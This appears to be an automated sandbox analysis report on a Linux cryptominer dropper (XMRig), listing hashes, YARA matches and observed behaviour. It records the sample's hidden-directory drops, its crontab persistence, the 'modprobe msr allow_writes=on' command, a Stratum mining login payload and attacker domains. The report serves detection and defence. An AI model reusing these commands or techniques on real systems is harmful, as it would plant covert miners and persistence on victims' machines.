Linux Analysis Report
.main.elf

Overview

General Information

Sample name:	.main.elf
Analysis ID:	1545520
MD5:	1b1445cab8443509f13769a3c479404f
SHA1:	9b1fcc3637f92d8fa281f7ab2243cb382f4be285
SHA256:	864a395c401c668ac8e23aa27eb4bc281e3734d4eafc29178174d79bae48a173
Tags:	elfuser-abuse_ch
Infos:

Detection

Xmrig

Score:	92
Range:	0 - 100
Whitelisted:	false

Signatures

Malicious sample detected (through community Yara rule)

Yara detected Xmrig cryptocurrency miner

Detected Stratum mining protocol

Drops invisible ELF files

Executes the "crontab" command typically for achieving persistence

Found strings related to Crypto-Mining

Sample reads /proc/mounts (often used for finding a writable filesystem)

Sample tries to persist itself using cron

Tries to load the MSR kernel module used for reading/writing to CPUs model specific register

Writes ELF files to hidden directories

Writes to CPU model specific registers (MSR) (e.g. miners improve performance by disabling HW prefetcher)

Creates hidden files and/or directories

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "grep" command used to find patterns in files or piped streams

Executes the "mkdir" command used to create folders

Executes the "modprobe" command used for loading kernel modules

Executes the "pgrep" command search for and/or send signals to processes

Executes the "rm" command used to delete files or directories

Executes the "sleep" command used to delay execution and potentially evade sandboxes

Executes the "wget" command typically used for HTTP/S downloading

Reads CPU information from /proc indicative of miner or evasive malware

Reads CPU information from /sys indicative of miner or evasive malware

Reads system information from the proc file system

Reads the 'hosts' file potentially containing internal network hosts

Sample has stripped symbol table

Sample tries to set the executable flag

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Writes shell script file to disk with an unusual file extension

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
XMRIG		No Attribution	https://www.aquasec.com/blog/container-security-tnt-container-attack/ https://www.aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.xmrig

Signatures

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: diicot PID: 6257, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: .report_system PID: 6257, type: MEMORYSTR
Source: Yara match	File source: /var/tmp/.rcu_gp/.report_system, type: DROPPED

Detected Stratum mining protocol

Source: global traffic

TCP traffic: 192.168.2.23:48596 -> 91.184.240.129:80 payload: data raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 62 75 6e 72 61 75 22 2c 22 70 61 73 73 22 3a 22 62 75 6e 72 61 75 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 32 31 2e 30 20 28 4c 69 6e 75 78 20 78 38 36 5f 36 34 29 20 6c 69 62 75 76 2f 31 2e 34 34 2e 32 20 67 63 63 2f 37 2e 33 2e 31 22 2c 22 61 6c 67 6f 22 3a 5b 22 72 78 2f 30 22 2c 22 63 6e 2f 32 22 2c 22 63 6e 2f 72 22 2c 22 63 6e 2f 66 61 73 74 22 2c 22 63 6e 2f 68 61 6c 66 22 2c 22 63 6e 2f 78 61 6f 22 2c 22 63 6e 2f 72 74 6f 22 2c 22 63 6e 2f 72 77 7a 22 2c 22 63 6e 2f 7a 6c 73 22 2c 22 63 6e 2f 64 6f 75 62 6c 65 22 2c 22 63 6e 2f 63 63 78 22 2c 22 63 6e 2d 6c 69 74 65 2f 31 22 2c 22 63 6e 2d 68 65 61 76 79 2f 30 22 2c 22 63 6e 2d 68 65 61 76 79 2f 74 75 62 65 22 2c 22 63 6e 2d 68 65 61 76 79 2f 78 68 76 22 2c 22 63 6e 2d 70 69 63 6f 22 2c 22 63 6e 2d 70 69 63 6f 2f 74 6c 6f 22 2c 22 63 6e 2f 75 70 78 32 22 2c 22 63 6e 2f 31 22 2c 22 72 78 2f 77 6f 77 22 2c 22 72 78 2f 61 72 71 22 2c 22 72 78 2f 67 72 61 66 74 22 2c 22 72 78 2f 73 66 78 22 2c 22 72 78 2f 6b 65 76 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 76 32 22 2c 22 61 72 67 6f 6e 32 2f 6e 69 6e 6a 61 22 2c 22 67 68 6f 73 74 72 69 64 65 72 22 5d 7d 7d 0a data ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"bunrau","pass":"bunrau","agent":"xmrig/6.21.0 (linux x86_64) libuv/1.44.2 gcc/7.3.1","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}

Found strings related to Crypto-Mining

Source: diicot, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp	String found in binary or memory: stratum+ssl://randomx.xmrig.com:443
Source: diicot, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp	String found in binary or memory: CryptonightR_instruction_mov105
Source: diicot, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: diicot, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp	String found in binary or memory: stratum+tcp://
Source: diicot, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: diicot, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp	String found in binary or memory: XMRig 6.21.0

Tries to load the MSR kernel module used for reading/writing to CPUs model specific register

Source: /bin/sh (PID: 6270)

Modprobe: /sbin/modprobe -> /sbin/modprobe msr allow_writes=on

Source: /var/tmp/.rcu_gp/./.report_system (PID: 6263)	MSR open for writing: /dev/cpu/0/msr			Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6263)	MSR open for writing: /dev/cpu/1/msr			Jump to behavior

Source: /usr/bin/pgrep (PID: 6256)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_cpus	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_id	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/die_cpus	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/package_cpus	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/physical_package_id	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/level	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/type	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/id	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/size	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/level	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/type	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/id	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/level	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/type	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/id	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/size	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/level	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/type	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/id	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/size	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/core_cpus	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/core_id	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/die_cpus	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/package_cpus	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/physical_package_id	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/shared_cpu_map	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/level	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/type	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/id	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/size	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/coherency_line_size	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/number_of_sets	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/physical_line_partition	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/shared_cpu_map	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/level	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/type	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/id	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/shared_cpu_map	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/level	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/type	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/id	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/size	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/coherency_line_size	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/number_of_sets	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/physical_line_partition	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/shared_cpu_map	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/level	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/type	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/id	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/size	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/coherency_line_size	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/number_of_sets	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/physical_line_partition	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads CPU info from /sys: /sys/devices/system/cpu/possible	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/pgrep (PID: 6300)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/pgrep (PID: 6311)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/pgrep (PID: 6319)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/pgrep (PID: 6329)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/pgrep (PID: 6335)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/pgrep (PID: 6344)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior

Source: /usr/bin/wget (PID: 6233)	Reads hosts file: /etc/hosts			Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6263)	Reads hosts file: /etc/hosts			Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: xkobeimparatu.net
Source: global traffic	DNS traffic detected: DNS query: xkobeproxy.xkobeimparatu.net

Source: .main.elf	String found in binary or memory: https://bugs.launchpad.net/ubuntu/
Source: .report_system, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp	String found in binary or memory: https://gcc.gnu.org/bugsterminate
Source: diicot, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, .report_system, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp	String found in binary or memory: https://xmrig.com/benchmark/%s
Source: diicot, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, .report_system, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: diicot, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, .report_system, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp	String found in binary or memory: https://xmrig.com/wizard
Source: diicot, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, .report_system, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp	String found in binary or memory: https://xmrig.com/wizard%s

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: dump.pcap, type: PCAP	Matched rule: Linux_Cryptominer_Camelot_cdd631c1 Author: unknown
Source: dump.pcap, type: PCAP	Matched rule: Linux_Cryptominer_Malxmr_979160f6 Author: unknown
Source: dump.pcap, type: PCAP	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: dump.pcap, type: PCAP	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Cryptominer_Camelot_cdd631c1 Author: unknown
Source: 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Cryptominer_Malxmr_979160f6 Author: unknown
Source: 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: diicot PID: 6257, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: .report_system PID: 6257, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: /var/tmp/.rcu_gp/.report_system, type: DROPPED	Matched rule: Linux_Cryptominer_Camelot_cdd631c1 Author: unknown

Source: /bin/bash (PID: 6242)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/bash (PID: 6250)	Crontab executable: /usr/bin/crontab -> crontab /var/tmp/.rcu_gp/.ps5	Jump to behavior
Source: /bin/bash (PID: 6258)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/bash (PID: 6286)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/bash (PID: 6301)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/bash (PID: 6312)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/bash (PID: 6322)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/bash (PID: 6330)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/bash (PID: 6338)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior

Source: /usr/bin/crontab (PID: 6250)	File: /var/spool/cron/crontabs/tmp.VYCskO			Jump to behavior
Source: /usr/bin/crontab (PID: 6250)	File: /var/spool/cron/crontabs/root			Jump to behavior

Source: dump.pcap, type: PCAP	Matched rule: Linux_Cryptominer_Camelot_cdd631c1 reference_sample = 91549c171ae7f43c1a85a303be30169932a071b5c2b6cf3f4913f20073c97897, os = linux, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Cryptominer.Camelot, fingerprint = fa174ac25467ab6e0f11cf1f0a5c6bf653737e9bbdc9411aabeae460a33faa5e, id = cdd631c1-2c03-47dd-b50a-e8c0b9f67271, last_modified = 2021-09-16
Source: dump.pcap, type: PCAP	Matched rule: Linux_Cryptominer_Malxmr_979160f6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Cryptominer.Malxmr, fingerprint = fb933702578e2cf7e8ad74554ef93c07b610d6da8bc5743cbf86c363c1615f40, id = 979160f6-402a-4e4b-858a-374c9415493b, last_modified = 2021-09-16
Source: dump.pcap, type: PCAP	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: dump.pcap, type: PCAP	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Cryptominer_Camelot_cdd631c1 reference_sample = 91549c171ae7f43c1a85a303be30169932a071b5c2b6cf3f4913f20073c97897, os = linux, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Cryptominer.Camelot, fingerprint = fa174ac25467ab6e0f11cf1f0a5c6bf653737e9bbdc9411aabeae460a33faa5e, id = cdd631c1-2c03-47dd-b50a-e8c0b9f67271, last_modified = 2021-09-16
Source: 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Cryptominer_Malxmr_979160f6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Cryptominer.Malxmr, fingerprint = fb933702578e2cf7e8ad74554ef93c07b610d6da8bc5743cbf86c363c1615f40, id = 979160f6-402a-4e4b-858a-374c9415493b, last_modified = 2021-09-16
Source: 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: diicot PID: 6257, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: .report_system PID: 6257, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: /var/tmp/.rcu_gp/.report_system, type: DROPPED	Matched rule: Linux_Cryptominer_Camelot_cdd631c1 reference_sample = 91549c171ae7f43c1a85a303be30169932a071b5c2b6cf3f4913f20073c97897, os = linux, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Cryptominer.Camelot, fingerprint = fa174ac25467ab6e0f11cf1f0a5c6bf653737e9bbdc9411aabeae460a33faa5e, id = cdd631c1-2c03-47dd-b50a-e8c0b9f67271, last_modified = 2021-09-16

Source: /usr/bin/chmod (PID: 6239)	File: /var/tmp/.rcu_gp/.report_system (bits: - usr: rx grp: rx all: rwx)			Jump to behavior
Source: /usr/bin/chmod (PID: 6241)	File: /var/tmp/.rcu_gp/diicot (bits: - usr: rx grp: rx all: rwx)			Jump to behavior

Source: /bin/bash (PID: 6231)	File: /var/tmp/.rcu_gp/.ps4	Jump to behavior
Source: /bin/bash (PID: 6231)	File: /var/tmp/.rcu_gp/.ps5	Jump to behavior
Source: /usr/bin/mkdir (PID: 6232)	Directory: /var/tmp/.rcu_gp	Jump to behavior
Source: /usr/bin/wget (PID: 6233)	File: /var/tmp/.rcu_gp/.report_system	Jump to behavior
Source: /usr/bin/crontab (PID: 6250)	Directory: /var/tmp/.rcu_gp/.ps5	Jump to behavior
Source: /usr/bin/cat (PID: 6254)	Directory: /var/tmp/.rcu_gp/.ps4	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Directory: /root/.xmrig.json	Jump to behavior
Source: /usr/bin/cat (PID: 6283)	Directory: /var/tmp/.rcu_gp/.ps4	Jump to behavior
Source: /usr/bin/cat (PID: 6298)	Directory: /var/tmp/.rcu_gp/.ps4	Jump to behavior
